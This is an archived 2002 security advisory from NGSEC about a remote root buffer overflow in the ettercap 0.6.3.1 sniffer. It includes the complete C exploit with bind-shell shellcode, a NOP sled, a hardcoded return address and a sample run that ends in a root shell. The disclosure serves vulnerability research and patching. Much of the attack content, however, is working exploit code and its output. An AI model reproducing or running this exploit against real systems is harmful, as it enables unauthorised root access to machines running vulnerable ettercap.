ettercap-0.6.3.txt

2002-02-19T00:00:00
ID PACKETSTORM:25765
Type packetstorm
Reporter FJ Serna
Modified 2002-02-19T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
  
Next Generation Security Technologies  
http://www.ngsec.com  
Security Advisory  
  
  
Title: Ettercap, remote root compromise  
ID: NGSEC-2002-1  
Application: ettercap 0.6.3.1 and older (http://ettercap.sourceforge.net)  
Date: 05/02/2002  
Status: Vendor Contacted, new fixed version released.  
Platform: Linux on interfaces with MTU > 2000  
Author: Fermín J. Serna <fjserna@ngsec.com>  
Location: http://www.ngsec.com/docs/advisories/NGSEC-2002-1.txt  
  
  
Overview:  
- ---------  
  
As it is said in ettercap's home page "Ettercap is a multipurpose  
sniffer/interceptor/logger for switched LAN". Due to improper use of the  
memcpy() function, anyone can crash ettercap and execute code as root  
user.  
  
Vulnerabiliy has been confirmed and exploited in ettercap's version  
0.6.3.1. Older versions maybe vulnerable too.  
  
This vulnerability only exists on Linux version because on *BSD and MacOSX  
ettercap only works on ethernets devices.  
  
Technical description:  
- ----------------------  
  
Ettercap is composed of decoders which looks for user, passwords,  
communities and stuff alike.  
  
Several decoders (mysql, irc, ...) suffer the following problem:  
  
memcpy(collector, payload, data_to_ettercap->datalen);  
  
Collector is declared as:  
  
u_char collector[MAX_DATA];  
  
Where MAX_DATA is:  
  
#define MAX_DATA 2000  
  
Datalen is the data (after TCP/UDP header) length read from the interface.  
So on interfaces where MTU is higher than 2000 you can exploit ettercap.  
Since normal ethernets have MTU:1500 this bug can not be exploited due to  
unsupported defragmentation in ettercap, but may be crashed with a forged  
packet (ip->tot_len > MAX_DATA).  
  
Here are common MTU and interface types:  
  
65535 Hyperchannel  
17914 16 Mbit/sec token ring  
8166 Token Bus (IEEE 802.4)  
4464 4 Mbit/sec token ring (IEEE 802.5)  
1500 Ethernet  
1500 PPP (typical; can vary widely)  
  
  
Exploit for this vulnerability can be found at  
  
http://www.ngsec.com/dowloads/exploits/ettercap-x.c  
  
Sample explotation could be also in loopback interfaces: MTU:16436  
  
piscis:~# ettercap -NszC -i lo &  
[1] 21887  
piscis:~# ./ettercap-x 0 | nc localhost 3306  
ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>  
Next Generation Security Technologies  
http://www.ngsec.com  
  
punt!  
piscis:~# telnet localhost 36864  
Trying 127.0.0.1...  
Connected to localhost.  
Escape character is '^]'.  
id;  
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)  
  
  
Recomendations:  
- ---------------  
  
Upgrate to a newer ettercap version.  
Run ettercap on a secure environment.  
  
  
More advisories at: http://www.ngsec.com/advisories/  
PGP Key: http://www.ngsec.com/labs.asc  
  
(c)Copyright 2002 NGSEC. All rights reserved.  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.0.6 (GNU/Linux)  
Comment: Made with pgp4pine 1.76  
  
iD8DBQE8awI5KrwoKcQl8Y4RAl5HAJsHgiOuhE08kArQNKrOPPhQDkW6swCfUkAH  
307ifuCsbg5mxFlTvhr4jbY=  
=o2T9  
-----END PGP SIGNATURE-----  
  
  
/*   
* ettercap-0.6.3.1 remote root xploit   
*  
* By: Fermín J. Serna <fjserna@ngsec.com>  
* Next Generation Security Technologies  
* http://www.ngsec.com  
*  
* DESCRIPTION:  
* ============  
*  
* Several decoders (mysql, irc, ...) suffer the following problem:  
*  
* memcpy(collector, payload, data_to_ettercap->datalen);  
*  
* collector is declared as:   
*  
* u_char collector[MAX_DATA];  
*   
* where MAX_DATA is:  
*  
* #define MAX_DATA 2000  
*  
* So on interfaces where MTU is higher than 2000 you can exploit   
* ettercap. Nop, normal ethernets have MTU:1500 ;P  
*  
* Here are common MTU and interface types:  
*   
* 65535 Hyperchannel  
* 17914 16 Mbit/sec token ring  
* 8166 Token Bus (IEEE 802.4)  
* 4464 4 Mbit/sec token ring (IEEE 802.5)  
* 1500 Ethernet  
* 1500 PPP (typical; can vary widely)  
*  
* Sample explotation could be also in loopback interfaces: MTU:16436  
*  
* piscis:~# ettercap -NszC -i lo &  
* [1] 21887  
* piscis:~# ./ettercap-x 0 | nc localhost mysql  
* ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>  
* Next Generation Security Technologies  
* http://www.ngsec.com   
*  
* punt!  
* piscis:~# telnet localhost 36864  
* Trying 127.0.0.1...  
* Connected to localhost.  
* Escape character is '^]'.  
* id;  
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)  
*  
* Madrid, 5/02/2002  
*  
*/   
  
  
#include <stdio.h>  
#include <string.h>  
  
#define NUM_ADDR 100  
#define NOP 0x41  
#define BUFF_SIZE 2200  
#define RET_ADDR 0xbfffea58  
#define OFFSET 0  
  
char shellcode[]=  
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"  
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"  
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"  
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"  
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"  
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"  
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"  
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"  
"/bin/sh";  
  
int main(int argc, char **argv) {  
char buffer[BUFF_SIZE];  
char *ch_ptr;  
unsigned long *lg_ptr;  
int aux;  
int offset=OFFSET;  
  
fprintf(stderr,"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\n");  
fprintf(stderr,"Next Generation Security Technologies\n");  
fprintf(stderr,"http://www.ngsec.com\n\n");  
  
  
if (argc==2) offset=atoi(argv[1]);  
  
memset(buffer,0,sizeof(buffer));  
  
ch_ptr=buffer;  
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);  
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;  
memcpy(ch_ptr,shellcode,strlen(shellcode));  
ch_ptr+=strlen(shellcode);  
lg_ptr=(unsigned long *)ch_ptr;  
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;  
ch_ptr=(char *)lg_ptr;  
*ch_ptr='\0';  
  
printf("%s",buffer);  
  
return(0);  
  
}  
  
  
`